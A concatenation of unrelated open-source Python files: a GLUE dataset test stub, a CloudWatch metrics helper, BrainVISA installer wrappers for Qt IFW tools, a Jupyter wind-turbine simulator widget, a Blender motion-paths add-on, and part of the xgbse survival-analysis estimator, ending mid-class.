  VERSION = "experimental_latest"
class GlueMnliS3Test(GlueMnliTest):
  VERSION = "experimental_latest"
class GlueQnliS3Test(GlueQnliTest):
  VERSION = "experimental_latest"
class GlueRteS3Test(GlueRteTest):
  VERSION = "experimental_latest"
class GlueWnliS3Test(GlueWnliTest):
  VERSION = "experimental_latest"
class GlueMrpcS3Test(GlueMrpcTest):
  VERSION = "experimental_latest"
if __name__ == "__main__":
  testing.test_main()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import functools
from dataclasses import dataclass
from enum import Enum
import typing as t
import boto3
from datetime import datetime, timedelta
from hmalib.metrics import measure_performance, METRICS_NAMESPACE
@functools.lru_cache(maxsize=None)
def _get_cloudwatch_client():
    """Return a process-wide, lazily created boto3 CloudWatch client.

    lru_cache makes this a singleton: the client is built on first call
    and reused afterwards.
    """
    return boto3.client("cloudwatch")
def is_publishing_metrics():
    """
    Does this terraform deployment publish metrics to cloudwatch?

    NOTE(review): this returns the imported ``measure_performance``
    object itself rather than an explicit bool — presumably callers
    rely only on its truthiness; confirm against hmalib.metrics.
    """
    return measure_performance
class MetricTimePeriod(Enum):
HOURS_24 = "24h"
HOURS_1 = "1h"
DAYS_7 = "7d"
def _start_time(period: MetricTimePeriod):
delta = {
MetricTimePeriod.HOURS_1: timedelta(hours=1),
MetricTimePeriod.HOURS_24: timedelta(days=1),
MetricTimePeriod.DAYS_7: timedelta(days=7),
}[period] or timedelta(days=1)
return datetime.now() - delta
def _period(period: MetricTimePeriod):
"""
Granularity of AWS statistics.
1 minute for HOURS_1; returns 60 data points
10 minutes for HOURS_24; returns 144 data points
1 hour for DAYS_7; return 168 data points
"""
return {
MetricTimePeriod.HOURS_1: 60,
MetricTimePeriod.HOURS_24: 60 * 10,
MetricTimePeriod.DAYS_7: 60 * 60,
}[period] or 60 * 10
def _pad_with_None_values(
graph_data: t.List[t.Tuple[datetime, t.Optional[int]]],
start_time: datetime,
end_time: datetime,
) -> t.List[t.Tuple[datetime, t.Optional[int]]]:
"""
Pad graph data with 0 values if the first or last entries are too far (>60
seconds) from start or end time respectively.
Note: Mutates the graph_data parameter, but returns it too.
"""
if (
len(graph_data) == 0
or abs((start_time - graph_data[0][0]).total_seconds()) > 60
):
# If start time and the first graph point have more than a minute, pad
graph_data.insert(0, (start_time, None))
if len(graph_data) == 0 or abs((end_time - graph_data[-1][0]).total_seconds()) > 60:
# If start time and the first graph point have more than a minute, pad
graph_data.append((end_time, None))
return graph_data
@dataclass
class CountMetricWithGraph:
    """Total for a metric over a period, plus points for graphing it.

    graph_data holds (timestamp, value) tuples; the first and last
    entries may carry None values (see _pad_with_None_values).
    """
    count: int
    graph_data: t.List[t.Tuple[datetime, t.Optional[int]]]
def get_count_with_graph(
    names: t.List[str], time_period: MetricTimePeriod
) -> t.Dict[str, CountMetricWithGraph]:
    """
    Given a time period and a set of metric names, gets the sum of the metric
    over the period and a graphable list of timestamps and values.

    The graph data always contains the start and end time stamps with None values
    to make graphing easier.

    Queries CloudWatch once per metric name, for the "<name>-count"
    metric in METRICS_NAMESPACE.
    """
    result = {}
    # Truncate to whole minutes and drop tzinfo so timestamps compare
    # cleanly with the naive datetimes produced below.
    start_time = _start_time(time_period).replace(second=0, microsecond=0, tzinfo=None)
    end_time = datetime.now().replace(second=0, microsecond=0, tzinfo=None)

    for metric_name in names:
        stats = _get_cloudwatch_client().get_metric_statistics(
            Namespace=METRICS_NAMESPACE,
            MetricName=f"{metric_name}-count",
            Statistics=["Sum"],
            StartTime=start_time,
            EndTime=end_time,
            Period=_period(time_period),
        )["Datapoints"]

        # Overall total over the whole window (sum of per-bucket sums).
        total = int(functools.reduce(lambda acc, s: acc + s["Sum"], stats, 0))

        graph_data: t.List[t.Tuple[datetime, t.Optional[int]]] = [
            # Removing tzinfo because you can't work with timezone aware
            # datetime objects and timezone unaware timedelta objects. Either
            # way, eventually, these get decomposed to an epoch value, so this
            # will not hurt.
            # `_pad_with_None_values` expects timezone unaware objects.
            (s["Timestamp"].replace(tzinfo=None), int(s["Sum"]))
            for s in stats
        ]
        # CloudWatch does not guarantee datapoint order.
        graph_data.sort(key=lambda t: t[0])  # Sort by timestamp
        graph_data = _pad_with_None_values(graph_data, start_time, end_time)

        result[metric_name] = CountMetricWithGraph(total, graph_data)

    return result
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Procedures to simplify the use of external tools.
#
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import subprocess
import logging
import hashlib
import distutils.spawn
from brainvisa.installer.bvi_utils.system import System
from brainvisa.installer.bvi_utils.paths import Paths
from brainvisa.installer.bvi_utils.bvi_exception import BVIException
def ifw_version(binary_creator_command=None, platform=None):
    """Try to guess IFW version.

    As the commands do not provide this info, all we can do for now is to try
    to find the "devtool" command, and guess it is version 2 if it is found,
    and 1 otherwise. Returns a one-element list ([2] or [1]), or an empty
    list when binarycreator cannot be located.
    """
    if not platform:
        platform = System.platform()
    bc = binary_creator_command or distutils.spawn.find_executable(
        Paths.binary_name(Paths.IFW_BINARYCREATOR, platform))
    if not bc:
        return []  # undefined

    # devtool, if present, lives next to the (resolved) binarycreator.
    install_dir = os.path.dirname(os.path.realpath(bc))
    devtool = Paths.binary_name(Paths.IFW_DEVTOOL, platform)
    if os.path.exists(os.path.join(install_dir, devtool)):
        return [2, ]
    return [1, ]
class PathTranslationType:
    """Direction of a path translation between host and target platforms."""
    # Translate a host (e.g. Unix) path to the target (e.g. Windows) form.
    HOST_TO_TARGET = 0
    # Translate a target path back to the host form.
    TARGET_TO_HOST = 1
def translate_path_wine(path,
                        translation_type=PathTranslationType.HOST_TO_TARGET):
    """Translate a path using the wine `winepath` tool.

    HOST_TO_TARGET converts a Unix path to its Windows form (-w);
    TARGET_TO_HOST does the reverse (-u).

    Raises RuntimeError when winepath cannot be found on PATH, and
    TypeError for an unknown translation_type.
    """
    wp = distutils.spawn.find_executable(Paths.WINEPATH)
    if not wp:
        # Bug fix: without this guard a missing winepath led to a
        # confusing subprocess error (cmd[0] would be None).
        raise RuntimeError('winepath executable not found')
    if translation_type == PathTranslationType.HOST_TO_TARGET:
        cmd = [wp, '-w', path]
    elif translation_type == PathTranslationType.TARGET_TO_HOST:
        cmd = [wp, '-u', path]
    else:
        raise TypeError('Wrong PathTranslationType %d' % translation_type)
    return subprocess.check_output(cmd, universal_newlines=True).strip()
def translate_path(path, platform_target,
                   translation_type=PathTranslationType.HOST_TO_TARGET):
    """Translate path between platform host and target.

    Returns the path unchanged when host and target match; otherwise
    only the Linux-host -> Windows-target case (via wine) is supported.
    """
    platform_host = System.platform()
    platform_host_family = System.platform_family(platform_host)
    platform_target_family = System.platform_family(platform_target)
    # NOTE(review): the host is compared against platform_target.upper() —
    # presumably System.platform() returns upper-case identifiers while
    # callers may pass lower-case targets; confirm against System.platform().
    if platform_host != platform_target.upper():
        if platform_host_family == System.Family.Linux \
                and platform_target_family == System.Family.Win:
            return translate_path_wine(path, translation_type)
        else:
            raise RuntimeError('No known path translation method between '
                               '%s (%s family) and %s (%s family) systems'
                               % (platform_host, platform_host_family,
                                  platform_target, platform_target_family))
    else:
        # Same platform: nothing to translate.
        return path
def binarycreator(
        installer_path, repository_path, additional_repositories=None,
        online_only=False, offline_only=False, exclude=None, include=None,
        platform_target=None, command=None):
    """The binarycreator tool creates an IFW installer.

    Parameters
    ----------
    installer_path : full path of installer binary.
    repository_path : full path of temporary repository.
    additional_repositories : additional repositories to find packages in
                              (default None, meaning none).
    online_only : True if the installer is only online
                  (default False).
    offline_only : True if the installer is only offline
                   (default False).
    exclude : list of excluded package's names (default None).
    include : list of included package's names (default None).
    platform_target : target platform to generate installer binary on
                      (default None, meaning the host platform).
    command : binarycreator command to use (default: resolved via Paths).
    """
    # Avoid the mutable-default-argument pitfall, and evaluate the host
    # platform at call time rather than at import time.
    if additional_repositories is None:
        additional_repositories = []
    if platform_target is None:
        platform_target = System.platform()

    param_online_only = ['--online-only'] if online_only else []
    param_offline_only = ['--offline-only'] if offline_only else []
    # Bug fix: the original called exclude.join(',') / include.join(''),
    # i.e. join() on the list instead of the separator, which raises
    # AttributeError. IFW expects a comma-separated package list.
    param_exclude = ['--exclude', ','.join(exclude)] if exclude else []
    param_include = ['--include', ','.join(include)] if include else []
    param_config = [
        '-c', translate_path('%s/config/config.xml' % repository_path,
                             platform_target)]
    param_packages = ['-p', translate_path('%s/packages' % repository_path,
                                           platform_target)]
    for r in additional_repositories:
        param_packages += ['-p', translate_path(r, platform_target)]

    path = os.path.dirname(installer_path)
    if not os.path.exists(path):
        os.makedirs(path)

    # Starts binary creator through target bv_env
    cmd = [command if command else Paths.binary_name(Paths.IFW_BINARYCREATOR,
                                                     platform_target)] \
        + param_online_only + param_offline_only + param_exclude \
        + param_include + param_config + param_packages \
        + [translate_path(installer_path, platform_target)]
    print(' '.join(cmd))
    subprocess.check_call(cmd)

    if System.platform() == System.MacOSX:
        return  # don't do the .md5 now: we must build the .dmg first.

    # build the MD5 sum file. hexdigest() yields the same hex string on
    # both Python 2 and 3, replacing the manual per-byte formatting, and
    # context managers close the file handles deterministically.
    m = hashlib.md5()
    with open(installer_path, 'rb') as installer_file:
        m.update(installer_file.read())
    with open(installer_path + '.md5', 'w') as md5_file:
        md5_file.write(m.hexdigest())
def repogen(path_repository_in, path_repository_out,
            components=None, update=False,
            exclude=None):  # pylint: disable=R0913
    """The repogen tool generates an online IFW repository.

    Parameters
    ----------
    path_repository_in : full path of temporary repository.
    path_repository_out : full path of IFW repository.
    components : additional components (default None).
    update : True if the existing IFW repository must be updated.
    exclude : list of excluded package's names (default None).
    """
    # Bug fixes: param_components was gated on `exclude` instead of
    # `components`, and join() was called on the lists instead of the
    # separator string (lists have no join method).
    param_components = [','.join(components)] if components else []
    param_update = ['--update'] if update else []
    param_exclude = ['--exclude', ','.join(exclude)] if exclude else []
    # param_updateurl = '-u %s' % updateurl if updateurl else ''
    param_packages = ["-p", "%s/packages" % path_repository_in]
    cmd = [Paths.binary_name(Paths.IFW_REPOGEN, System.platform())] \
        + param_packages + param_update + param_exclude \
        + param_components + [path_repository_out]
    # param_updateurl,
    print(' '.join(cmd))
    subprocess.check_call(cmd)
def archivegen(folder):
    """The archivegen tool compresses the files in folder as a 7zip archive.

    The archive will have the same name as the folder with the 7z extension.
    Any pre-existing archive of that name is removed first.

    Parameter
    ---------
    folder:
        folder with data which must be compressed.

    Raises
    ------
    BVIException when archivegen exits with a non-zero status.
    """
    command = Paths.binary_name(Paths.IFW_ARCHIVEGEN, System.platform())
    archive = '%s.7z' % folder
    args = [command] + Paths.ARCHIVEGEN_OPTIONS + [archive, '%s' % folder]
    print(' '.join(args))
    if os.path.exists(archive):
        os.unlink(archive)
    process = subprocess.Popen(args, stdout=subprocess.PIPE, cwd=folder)
    # Drain stdout before checking the return code: with stdout=PIPE and
    # no reader, a chatty tool can fill the pipe buffer and deadlock.
    process.communicate()
    result = process.returncode
    logging.getLogger().info(result)
    # Bug fix: the original tested `result < 0`, which only catches death
    # by signal; an ordinary failure exit code (e.g. 1) was silently
    # ignored.
    if result != 0:
        raise BVIException(BVIException.ARCHIVEGEN_FAILED, folder)
def bv_packaging(name, type_, folder, make_options=None, platform_target=None):
    """Package a component with no dependency.

    Runs the project's bv_packaging script (through the host bv_env
    wrapper) as a subprocess; raises CalledProcessError on failure.

    Parameters
    ----------
    name : package name.
    type_ : type of package: run, doc, usrdoc, devdoc, test.
    folder : destination full path.
    make_options : extra options forwarded via --make-options (optional).
    platform_target : target platform to generate packages for
    """
    # Invocation shape: bv_env python bv_packaging dir -o <folder> ...
    args = [os.path.join(Paths.BV_BIN,
                         Paths.binary_name(Paths.BV_ENV_HOST,
                                           System.platform())),
            Paths.binary_name('python', System.platform()),
            os.path.join(Paths.BV_BIN, Paths.BV_PACKAGING),
            'dir',
            '-o', folder,
            '--wrappers',
            '--no-deps',
            '--installer']
    if make_options is not None and len(make_options.strip()) > 0:
        args += ['--make-options', make_options]
    if platform_target is not None and len(platform_target.strip()) > 0:
        args += ['--platform-target', platform_target]
    # Component selector, e.g. "+name=foo,type=run".
    args += ['+name=%s,type=%s' % (name, type_)]
    subprocess.check_call(args)
|
<reponame>vikeshpandey/amazon-sagemaker-edge-manager-workshop
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import ipywidgets as widgets
import random
import time
class WindTurbine(object):
    """ Represents virtually and graphically a wind turbine

    It uses the raw data collected from a Wind Turbine in a circular buffer
    to simulate the real turbine sensors.
    """

    def __init__(self, turbine_id=0, raw_data=None):
        if raw_data is None or len(raw_data) == 0:
            raise Exception("You need to pass an array with at least one row for raw data")
        self.turbine_id = turbine_id  # id of the turbine
        self.raw_data = raw_data  # buffer with the raw sensors data
        # Start reading at a random offset so turbines don't emit in sync.
        self.raw_data_idx = random.randint(0, len(raw_data)-1)
        self.running = False  # running status
        self.halted = False  # if True you can't use this turbine anymore. create a new one.

        # components of the UI
        self.stopped_img = open('../../../imgs/wind_turbine.png', 'rb').read()
        self.running_img = open('../../../imgs/wind_turbine.gif', 'rb').read()
        self.button = widgets.Button(description='Start (Id: %d)' % self.turbine_id)
        self.button.on_click(self.__on_button_clicked)
        self.img = widgets.Image(value=self.stopped_img,width=150, height=170)
        self.status_label = widgets.Label(
            layout={'width': "150px"}, value=''
        )
        # Valid widgets render a green check (True) or a red cross (False).
        self.vibration_status = widgets.Valid(value=False, description='Vibration')
        self.voltage_status = widgets.Valid(value=False, description='Voltage')
        self.rotation_status = widgets.Valid(value=False, description='Rotation')
        self.noise_buttons = [
            widgets.Button(description='Volt', layout={'width': '50px'}),
            widgets.Button(description='Rot', layout={'width': '50px'}),
            widgets.Button(description='Vib', layout={'width': '50px'})
        ]
        for i in self.noise_buttons: i.on_click(self.__on_noise_button_clicked)
        # Hidden until a model is loaded; see update_label().
        self.anomaly_status = widgets.VBox([
            self.vibration_status, self.voltage_status, self.rotation_status,
            widgets.Label("Inject noise"),
            widgets.HBox(self.noise_buttons)
        ], layout={'visibility': 'hidden'})

    def __on_noise_button_clicked(self, btn):
        # change color when enabled/disabled (lightgreen == noise enabled)
        btn.style.button_color = 'lightgreen' if btn.style.button_color is None else None

    def __on_button_clicked(self, _):
        """ Deals with the event of Starting / Stopping the Turbine"""
        if self.halted:
            # a halted turbine ignores further clicks
            return
        if not self.running:
            self.running = True
            self.button.description = 'Stop (Id: %d)' % self.turbine_id
            self.img.value = self.running_img
        else:
            self.running = False
            self.button.description = 'Start (Id: %d)' % self.turbine_id
            self.img.value = self.stopped_img
        # Refresh the anomaly panel visibility for the new running state.
        self.update_label(self.status_label.value)

    def is_running(self):
        """ Returns True while the turbine simulation is started. """
        return self.running

    def update_label(self, value):
        """ Sets the status text and toggles the anomaly panel visibility. """
        self.status_label.value = value
        if self.is_running() and value.startswith('Model Loaded'):
            self.anomaly_status.layout.visibility='visible'
        else:
            self.anomaly_status.layout.visibility='hidden'

    def detected_anomalies(self, values, anomalies ):
        """ Updates the status of the 'inject noise' buttons (pressed or not)"""
        # NOTE(review): 'values' is unused here. Index mapping assumed:
        # anomalies[0:3] -> vibration, [3:5] -> voltage, [5] -> rotation —
        # confirm against the feature order of the model producing 'anomalies'.
        self.vibration_status.value = not anomalies[0:3].any()
        self.voltage_status.value = not anomalies[3:5].any()
        self.rotation_status.value = not anomalies[5]

    def is_noise_enabled(self, typ):
        """ Returns the status of the 'inject noise' buttons (pressed or not)"""
        assert(typ == 'Vol' or typ == 'Rot' or typ == 'Vib')
        idx = 0
        if typ == 'Vol': idx = 0
        elif typ == 'Rot': idx = 1
        elif typ == 'Vib': idx = 2
        # A lightgreen button means noise injection is enabled.
        return self.noise_buttons[idx].style.button_color == 'lightgreen'

    def halt(self):
        """ Halts the turbine and disables it. After calling this method you can't use it anymore."""
        self.running = False
        self.button.description = 'Halted'
        self.img.value = self.stopped_img
        self.anomaly_status.layout.visibility='hidden'
        self.halted = True

    def read_next_sample(self):
        """ next step in this simulation """
        # circular buffer: wrap around when the end is reached
        if self.raw_data_idx >= len(self.raw_data): self.raw_data_idx = 0
        sample = self.raw_data[self.raw_data_idx]
        self.raw_data_idx += 1
        return sample

    def show(self):
        """ Return a IPython Widget that will render the turbine inside the notebook """
        return widgets.VBox([
            self.img, self.button, self.status_label, self.anomaly_status
        ])
|
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
Bone Motion Paths:
Match Frame Range + Clear All Paths
* Clear All Paths:
Silly operator to loop through all bones and clear their paths, useful
when having hidden bones (otherwise you have to go through each one of
them and clear manually)
*Match Current Frame Range:
Set the current frame range as motion path range.
Both requests by Hjalti from Project Pampa
Thanks to <NAME> for helping finding out the weirdness behind
Motion Paths bpy.
Developed during Caminandes Open Movie Project
"""
import bpy
class AMTH_POSE_OT_paths_clear_all(bpy.types.Operator):
    """Clear motion paths from all bones"""
    bl_idname = "pose.paths_clear_all"
    bl_label = "Clear All Motion Paths"
    bl_options = {"UNDO"}

    @classmethod
    def poll(cls, context):
        # Only available while in pose mode.
        return context.mode == "POSE"

    def execute(self, context):
        # silly but works: the built-in pose.paths_clear operator only
        # acts on selected bones, so select each bone in turn, clear,
        # then deselect — this reaches hidden bones too.
        for b in context.object.data.bones:
            b.select = True
            bpy.ops.pose.paths_clear()
            b.select = False
        return {"FINISHED"}
class AMTH_POSE_OT_paths_frame_match(bpy.types.Operator):
    """Match Start/End frame of scene to motion path range"""
    bl_idname = "pose.paths_frame_match"
    bl_label = "Match Frame Range"
    bl_options = {"UNDO"}

    def execute(self, context):
        avs = context.object.pose.animation_visualization
        scene = context.scene
        # "RANGE" paths use absolute frame_start/frame_end; the other
        # type is relative to the current frame (frame_before/after).
        # In both cases prefer the preview range when it is active.
        if avs.motion_path.type == "RANGE":
            if scene.use_preview_range:
                avs.motion_path.frame_start = scene.frame_preview_start
                avs.motion_path.frame_end = scene.frame_preview_end
            else:
                avs.motion_path.frame_start = scene.frame_start
                avs.motion_path.frame_end = scene.frame_end
        else:
            if scene.use_preview_range:
                avs.motion_path.frame_before = scene.frame_preview_start
                avs.motion_path.frame_after = scene.frame_preview_end
            else:
                avs.motion_path.frame_before = scene.frame_start
                avs.motion_path.frame_after = scene.frame_end
        return {"FINISHED"}
def pose_motion_paths_ui(self, context):
    """Draw the "Motion Paths Extras" UI (appended to DATA_PT_display).

    Offers update/calculate/clear buttons for the active bone's path,
    frame-range matching, and the clear-all operator.
    """
    layout = self.layout
    scene = context.scene
    avs = context.object.pose.animation_visualization
    # Bug fix: mpath was only assigned when an active pose bone exists,
    # but it is read below whenever any bones are selected; bones can be
    # selected without an active one, which raised NameError during draw.
    mpath = None
    if context.active_pose_bone:
        mpath = context.active_pose_bone.motion_path

    layout.separator()
    layout.label(text="Motion Paths Extras:")

    split = layout.split()

    col = split.column(align=True)

    if context.selected_pose_bones:
        if mpath:
            sub = col.row(align=True)
            sub.operator(
                "pose.paths_update", text="Update Path", icon="BONE_DATA")
            sub.operator("pose.paths_clear", text="", icon="X")
        else:
            col.operator(
                "pose.paths_calculate",
                text="Calculate Path",
                icon="BONE_DATA")
    else:
        col.label(text="Select Bones First", icon="ERROR")

    col = split.column(align=True)
    col.operator(
        AMTH_POSE_OT_paths_frame_match.bl_idname,
        text="Set Preview Frame Range" if scene.use_preview_range else "Set Frame Range",
        icon="PREVIEW_RANGE" if scene.use_preview_range else "TIME")

    col = layout.column()
    row = col.row(align=True)

    # Mirror the operator above: RANGE paths expose absolute start/end,
    # other types expose frames before/after the current frame.
    if avs.motion_path.type == "RANGE":
        row.prop(avs.motion_path, "frame_start", text="Start")
        row.prop(avs.motion_path, "frame_end", text="End")
    else:
        row.prop(avs.motion_path, "frame_before", text="Before")
        row.prop(avs.motion_path, "frame_after", text="After")

    layout.separator()
    layout.operator(AMTH_POSE_OT_paths_clear_all.bl_idname, icon="X")
def register():
    """Blender add-on hook: register operators and extend the display panel."""
    bpy.utils.register_class(AMTH_POSE_OT_paths_clear_all)
    bpy.utils.register_class(AMTH_POSE_OT_paths_frame_match)
    bpy.types.DATA_PT_display.append(pose_motion_paths_ui)


def unregister():
    """Blender add-on hook: undo everything register() did."""
    bpy.utils.unregister_class(AMTH_POSE_OT_paths_clear_all)
    bpy.utils.unregister_class(AMTH_POSE_OT_paths_frame_match)
    bpy.types.DATA_PT_display.remove(pose_motion_paths_ui)
|
import warnings
import numpy as np
import pandas as pd
import xgboost as xgb
from joblib import Parallel, delayed
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import BallTree
from sklearn.preprocessing import OneHotEncoder
# lib utils
from xgbse._base import XGBSEBaseEstimator, DummyLogisticRegression
from xgbse.converters import convert_data_to_xgb_format, convert_y, hazard_to_survival
# at which percentiles will the KM predict
from xgbse.non_parametric import get_time_bins, calculate_interval_failures
# at which percentiles will the KM predict
KM_PERCENTILES = np.linspace(0, 1, 11)

# Default XGBoost hyperparameters (AFT survival objective).
DEFAULT_PARAMS = {
    "objective": "survival:aft",
    "eval_metric": "aft-nloglik",
    "aft_loss_distribution": "normal",
    "aft_loss_distribution_scale": 1,
    "tree_method": "hist",
    "learning_rate": 5e-2,
    "max_depth": 8,
    "booster": "dart",
    "subsample": 0.5,
    "min_child_weight": 50,
    "colsample_bynode": 0.5,
}

# Default hyperparameters for the per-time-bin logistic regressions.
DEFAULT_PARAMS_LR = {"C": 1e-3, "max_iter": 500}
def _repeat_array(x, n):
"""
Repeats an array x n times. Resulting array of ((x*n) x 1) shape.
Args:
x (np.array): An array to be repeated
n (Int): Number of times to repeat array x
Returns:
(np.array): Array x repeated n times.
"""
return np.array([x] * n).T
def _build_multi_task_targets(E, T, time_bins):
"""
Builds targets for a multi task survival regression problem.
This function creates a times array from time 0 to T, where T is the
event/censor last observed time. If time_bins > T, times greater than the last observed
time T are considered equal to -1.
Args:
E ([np.array, pd.Series]): Array of censors(0)/events(1).
T ([np.array, pd.Series]): Array of times.
time_bins ([np.array]): Specified time bins to split targets.
Returns:
targets (pd.Series): A Series with multi task targets (for data existent just up to time T=t, all times over t are considered equal to -1).
time_bins (np.array): Time bins to be used for multi task survival analysis.
"""
events = _repeat_array(E, len(time_bins))
times = _repeat_array(T, len(time_bins)) < time_bins
targets = times.astype(int)
shifted_array = np.roll(targets, 1)
shifted_array[:, 0] = 0
shifted_array = shifted_array + targets
shifted_array[shifted_array == 2] = -1
shifted_array[np.logical_not(events) & times] = -1
return shifted_array, time_bins
# class to fit a BCE on the leaves of a XGB
class XGBSEDebiasedBCE(XGBSEBaseEstimator):
    """
    Train a set of logistic regressions on top of the leaf embedding produced by XGBoost,
    each predicting survival at different user-defined discrete time windows.
    The classifiers remove individuals as they are censored, with targets that are indicators
    of surviving at each window.

    !!! Note
        * Training and scoring of logistic regression models is efficient,
        being performed in parallel through joblib, so the model can scale to
        hundreds of thousands or millions of samples.
        * However, if many windows are used and data is large, training of
        logistic regression models may become a bottleneck, taking more time
        than training of the underlying XGBoost model.

    Read more in [How XGBSE works](https://loft-br.github.io/xgboost-survival-embeddings/how_xgbse_works.html).
    """

    def __init__(
        self,
        xgb_params=None,
        lr_params=None,
        n_jobs=-1,
    ):
        """
        Args:
            xgb_params (Dict, None): Parameters for XGBoost model.
                If not passed, the following default parameters will be used:

                ```
                DEFAULT_PARAMS = {
                    "objective": "survival:aft",
                    "eval_metric": "aft-nloglik",
                    "aft_loss_distribution": "normal",
                    "aft_loss_distribution_scale": 1,
                    "tree_method": "hist",
                    "learning_rate": 5e-2,
                    "max_depth": 8,
                    "booster": "dart",
                    "subsample": 0.5,
                    "min_child_weight": 50,
                    "colsample_bynode": 0.5,
                }
                ```

                Check <https://xgboost.readthedocs.io/en/latest/parameter.html> for more options.

            lr_params (Dict, None): Parameters for Logistic Regression models.
                If not passed, the following default parameters will be used:
                ```
                DEFAULT_PARAMS_LR = {"C": 1e-3, "max_iter": 500}
                ```
                Check <https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html> for more options.

            n_jobs (Int): Number of CPU cores used to fit logistic regressions via joblib.
        """
        if xgb_params is None:
            xgb_params = DEFAULT_PARAMS
        if lr_params is None:
            lr_params = DEFAULT_PARAMS_LR

        self.xgb_params = xgb_params
        self.lr_params = lr_params
        self.n_jobs = n_jobs
        # Set to True by fit(persist_train=True) to enable prototype-based
        # explainability; fit() then also stores a BallTree and index_id.
        self.persist_train = False
        # Populated by fit() from the trained booster's get_score().
        self.feature_importances_ = None
    def fit(
        self,
        X,
        y,
        num_boost_round=1000,
        validation_data=None,
        early_stopping_rounds=None,
        verbose_eval=0,
        persist_train=False,
        index_id=None,
        time_bins=None,
    ):
        """
        Transform feature space by fitting a XGBoost model and returning its leaf indices.
        Leaves are transformed and considered as dummy variables to fit multiple logistic
        regression models to each evaluated time bin.

        Args:
            X ([pd.DataFrame, np.array]): Features to be used while fitting XGBoost model

            y (structured array(numpy.bool_, numpy.number)): Binary event indicator as first field,
                and time of event or time of censoring as second field.

            num_boost_round (Int): Number of boosting iterations.

            validation_data (Tuple): Validation data in the format of a list of tuples [(X, y)]
                if user desires to use early stopping

            early_stopping_rounds (Int): Activates early stopping.
                Validation metric needs to improve at least once
                in every **early_stopping_rounds** round(s) to continue training.
                See xgboost.train documentation.

            verbose_eval ([Bool, Int]): Level of verbosity. See xgboost.train documentation.

            persist_train (Bool): Whether or not to persist training data to use explainability
                through prototypes

            index_id (pd.Index): User defined index if intended to use explainability
                through prototypes

            time_bins (np.array): Specified time windows to use when making survival predictions

        Returns:
            XGBSEDebiasedBCE: Trained XGBSEDebiasedBCE instance
        """

        E_train, T_train = convert_y(y)
        if time_bins is None:
            time_bins = get_time_bins(T_train, E_train)
        self.time_bins = time_bins

        # converting data to xgb format
        dtrain = convert_data_to_xgb_format(X, y, self.xgb_params["objective"])

        # converting validation data to xgb format
        evals = ()
        if validation_data:
            X_val, y_val = validation_data
            dvalid = convert_data_to_xgb_format(
                X_val, y_val, self.xgb_params["objective"]
            )
            evals = [(dvalid, "validation")]

        # training XGB
        self.bst = xgb.train(
            self.xgb_params,
            dtrain,
            num_boost_round=num_boost_round,
            early_stopping_rounds=early_stopping_rounds,
            evals=evals,
            verbose_eval=verbose_eval,
        )
        self.feature_importances_ = self.bst.get_score()

        # predicting and encoding leaves: the leaf indices act as an
        # embedding, one-hot encoded to serve as LR features
        self.encoder = OneHotEncoder()
        leaves = self.bst.predict(
            dtrain, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
        )
        leaves_encoded = self.encoder.fit_transform(leaves)

        # convert targets for using with logistic regression
        self.targets, self.time_bins = _build_multi_task_targets(
            E_train, T_train, self.time_bins
        )

        # fitting LR for several targets
        self.lr_estimators_ = self._fit_all_lr(leaves_encoded, self.targets)

        if persist_train:
            # store training leaves in a BallTree for prototype lookups
            self.persist_train = True
            if index_id is None:
                index_id = X.index.copy()

            index_leaves = self.bst.predict(
                dtrain, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
            )
            self.tree = BallTree(index_leaves, metric="hamming")

        self.index_id = index_id

        return self
def _fit_one_lr(self, leaves_encoded, target):
"""
Fits a single logistic regression to predict survival probability
at a certain time bin as target. Encoded leaves are used as features.
Args:
leaves_encoded (np.array): A tensor of one hot encoded leaves.
target (np.array): An array of time targets for a specific
Returns:
lr (sklearn.linear_model.LogisticRegression): A fitted Logistic
Regression model. This model outputs calibrated survival probabilities
on a time T.
"""
# masking
mask = target != -1
# by default we use a logistic regression
classifier = LogisticRegression(**self.lr_params)
if len(target[mask]) == 0:
# If there's no observation in a time bucket we raise an error
raise ValueError("Error: No observations in a time bucket")
elif len(np.unique(target[mask])) == 1:
# If there's only one class in a time bucket
# we create a dummy classifier that predicts that class and send a warning
warnings.warn(
"Warning: Only one class found in a time bucket", RuntimeWarning
)
classifier = DummyLogisticRegression()
classifier.fit(leaves_encoded[mask, :], target[mask])
return classifier
def _fit_all_lr(self, leaves_encoded, targets):
"""
Fits multiple Logistic Regressions to predict survival probability
for a list of time bins as target. Encoded leaves are used as features.
Args:
leaves_encoded (np.array): A tensor of one hot encoded leaves.
targets (np.array): An array of time targets for a specific time bin.
Returns:
lr_estimators (List): A list of fitted Logistic Regression models.
These models output calibrated survival probabilities for all times
in pre specified time bins.
"""
with Parallel(n_jobs=self.n_jobs) as parallel:
lr_estimators = parallel(
delayed(self._fit_one_lr)(leaves_encoded, targets[:, i])
for i in range(targets.shape[1])
)
return lr_estimators
def _predict_from_lr_list(self, lr_estimators, leaves_encoded, time_bins):
"""
Predicts survival probabilities from a list of multiple fitted
Logistic Regressions models. Encoded leaves are used as features.
Args:
lr_estimators (List): A list of fitted Logistic Regression models.
These models output calibrated survival probabilities for all times
in pre specified time bins.
leaves_encoded (np.array): A tensor of one hot encoded leaves.
time_bins (np.array): Specified time bins to split targets.
Returns:
preds (pd.DataFrame): A dataframe of estimated survival probabilities
for all times (columns), from the time_bins array, for all samples
(rows).
"""
with Parallel(n_jobs=self.n_jobs) as parallel:
preds = parallel(
delayed(m.predict_proba)(leaves_encoded) for m in lr_estimators
)
# organizing interval predictions from LRs
preds = np.array(preds)[:, :, 1].T
preds = pd.DataFrame(preds, columns=time_bins)
# converting these interval predictions
# to cumulative survival curve
return hazard_to_survival(preds)
